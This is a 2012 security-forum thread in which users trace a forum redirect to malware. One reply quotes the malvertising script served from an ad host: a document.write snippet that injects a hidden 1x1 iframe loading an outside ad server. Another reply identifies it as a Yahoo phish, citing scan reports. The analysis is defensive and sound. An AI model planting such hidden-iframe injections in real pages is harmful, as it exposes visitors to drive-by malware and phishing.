Author Topic: Forum redirect to malware - URL:Mal detected  (Read 8226 times)

0 Members and 1 Guest are viewing this topic.

AndyH

  • Guest
Re: Forum redirect to malware - URL:Mal detected
« Reply #15 on: August 01, 2012, 04:13:55 PM »
Looking further at the HHTP Analysis, the redirect originates from #3 in the list (adliclick.com):

This is the content response:

document.write('<a href="hxxp://hoteldetect.net" target="_blank"><img src="hxxp://adliclick.com/banners/12175/475737972919972/1.jpg" alt="" style="border:none" /></a>');document.write('<iframe src="hxxp://adbitserver.com/in?q=LfCAhlbgw9cnPT8tAbM5uSk36uh4OyeQxol9XkHX" frameborder="0" marginheight="0" marginwidth="0" scrolling="no" width="1" height="1"></iframe>');

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: Forum redirect to malware - URL:Mal detected
« Reply #16 on: August 01, 2012, 04:27:31 PM »
Hi AndyH,

This is a PHISH for yahoo as you can see from the external element in this scan: http://zulu.zscaler.com/submission/show/f552c70b095960fbb46e7f029360a2be-1343831094
100/100% malicious! I get
Content after the < /html> tag should be considered suspicious.

38: < !-- w234.fp.bf1.yahoo dot com uncompressed/chunked Wed Aug 1 07:37:16 PDT 2012 -->

See IDS alert here: http://urlquery.net/report.php?id=110442

polonus
« Last Edit: August 01, 2012, 04:38:33 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!